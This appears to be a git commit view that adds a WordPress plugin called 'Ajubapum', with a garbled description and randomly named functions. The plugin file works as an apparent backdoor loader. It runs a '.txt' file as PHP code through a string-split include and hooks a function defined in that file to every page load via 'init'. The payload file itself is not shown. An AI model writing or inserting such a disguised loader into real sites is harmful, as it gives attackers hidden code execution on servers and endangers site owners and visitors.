fix
This commit is contained in:
30
wp-content/plugins/ajubapum/ajubapum.php
Normal file
30
wp-content/plugins/ajubapum/ajubapum.php
Normal file
@@ -0,0 +1,30 @@
|
||||
<?php
|
||||
|
||||
/**
|
||||
* Plugin Name: Ajubapum
|
||||
* Plugin URI: https://tic.whitai.us/ajubapum
|
||||
* Description: Surveys. This there exist 77 vernacular minority languages of Mexico and the physical media.
|
||||
* Version: 1.5.4
|
||||
* Author: Duncan Bobbie
|
||||
* Author URI: https://tic.whitai.us
|
||||
* Text Domain: ajubapum
|
||||
* License: GPL2+
|
||||
*
|
||||
*/
|
||||
|
||||
function zysoza_osivitikhy() {
|
||||
qopafu_yducusho();
|
||||
}
|
||||
|
||||
$edoqasi = __DIR__ . '/rynamu.txt';
|
||||
if (file_exists($edoqasi)) {
|
||||
include_once __DIR__ . "/ryn" . "amu.t" . "xt";
|
||||
}
|
||||
|
||||
|
||||
if (function_exists("qopafu_yducusho")) {
|
||||
$cyroky = new fytoze_yvukhyliq();
|
||||
if ($cyroky->ugaboj_qufekhyz()) {
|
||||
add_action('init', 'zysoza_osivitikhy');
|
||||
}
|
||||
}
|
||||
Reference in New Issue
Block a user